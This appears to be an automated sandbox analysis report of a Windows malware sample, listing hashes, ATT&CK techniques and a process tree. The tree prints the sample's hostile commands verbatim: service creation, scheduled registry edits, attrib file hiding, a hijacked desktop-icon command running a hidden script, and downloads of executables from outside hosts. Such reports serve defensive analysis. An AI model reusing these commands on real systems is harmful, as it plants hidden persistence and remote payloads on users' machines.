5a43b4f04e348f964d91025fc4d849747047d5d85a0cf6d0cfcfbc622ab421d9

General

Target

1acc701bc67bb7e7a9c72ffc34128588.exe
Size

355KB
MD5

1acc701bc67bb7e7a9c72ffc34128588
SHA1

502258ad22f44ad1e311d6424ddd7fc3f7faff9b
SHA256

5a43b4f04e348f964d91025fc4d849747047d5d85a0cf6d0cfcfbc622ab421d9
SHA512

4caec99cbc2bd2b25c4df5538baac3058adcffad61c5633fa17f98c844b86ef76de916d81c31d10424624325bac79b817f43a9f02d5e3dfaa2d134c9f3096525
SSDEEP

6144:Fu2urzh9xu/XkauF5JgwFuaufWG7JbOB4Dklhd8r3AXX2z+2FB8+iTJiPUbVxXRP:Futrzh9xOXkWwJufWG7KlaAnUfiTJSSb

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2152	attrib.exe
2828	attrib.exe
2444	attrib.exe
2352	attrib.exe
828	attrib.exe
3000	attrib.exe
3012	attrib.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1452	sc.exe
1460	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2080 wrote to memory of 3056	2080	1acc701bc67bb7e7a9c72ffc34128588.exe	28
PID 2080 wrote to memory of 3056	2080	1acc701bc67bb7e7a9c72ffc34128588.exe	28
PID 2080 wrote to memory of 3056	2080	1acc701bc67bb7e7a9c72ffc34128588.exe	28
PID 2080 wrote to memory of 3056	2080	1acc701bc67bb7e7a9c72ffc34128588.exe	28
PID 2080 wrote to memory of 3056	2080	1acc701bc67bb7e7a9c72ffc34128588.exe	28
PID 2080 wrote to memory of 3056	2080	1acc701bc67bb7e7a9c72ffc34128588.exe	28
PID 2080 wrote to memory of 3056	2080	1acc701bc67bb7e7a9c72ffc34128588.exe	28

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2444	attrib.exe
2352	attrib.exe
828	attrib.exe
3000	attrib.exe
3012	attrib.exe
2152	attrib.exe
2828	attrib.exe

C:\Users\Admin\AppData\Local\Temp\1acc701bc67bb7e7a9c72ffc34128588.exe
"C:\Users\Admin\AppData\Local\Temp\1acc701bc67bb7e7a9c72ffc34128588.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2080
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup_free_newasp.vbs"
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.4555.net/index2.html?newasp
    3⤵
    PID:2756
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.4555.net/index2.html?newasp
      4⤵
      PID:1076
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1076 CREDAT:275457 /prefetch:2
        5⤵
        
        PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      PID:1452
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:1460
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:2520
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:2668
  - - C:\Windows\SysWOW64\at.exe
      at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2516
  - - C:\Windows\SysWOW64\at.exe
      at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2124
  - - C:\Windows\SysWOW64\at.exe
      at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2404
  - - C:\Windows\SysWOW64\at.exe
      at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\at.exe
      at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:1380
  - - C:\Windows\SysWOW64\at.exe
      at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\fav.cmd
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    PID:1292
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\Microsoft\win.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3012
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\fav\fav.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2152
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\36OSE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2828
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\361.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2444
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\360.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2352
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\tool.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:828
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\360SE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    PID:2148
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn2.exe
      ".\msn2.exe"
      4⤵
      PID:1472
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe" "http://soft.softdowns.info/install/YoudaoDict_zhusha_quantui_004.exe"
        5⤵
        
        PID:2960

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}"
1⤵
PID:2912

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
1⤵
PID:2528

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
1⤵
PID:1824

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
1⤵
PID:1760

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
1⤵
PID:1640

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
1⤵
PID:1936

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
1⤵
PID:1996

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command"
1⤵
PID:2232

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\software\Microsoft\win.vbs" /f
1⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder"
1⤵
PID:476

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
1⤵
PID:944

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
1⤵
PID:488

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
1⤵
PID:532

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
1⤵
PID:572

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command"
1⤵
PID:688

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)"
1⤵
PID:1484

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)"
1⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell"
1⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32"
1⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon"
1⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
1⤵
PID:1524

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
1⤵
PID:2892

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe" "http://download.youbak.com/msn/software/partner/37a.exe"
1⤵
PID:1628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

1

T1543

Windows Service

1

T1543.003

Privilege Escalation

Create or Modify System Process

1

T1543

Windows Service

1

T1543.003

Defense Evasion

Hide Artifacts

2

T1564

Hidden Files and Directories

2

T1564.001

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1472-193-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/1628-131-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1628-194-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/1628-411-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/2960-420-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2960-486-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads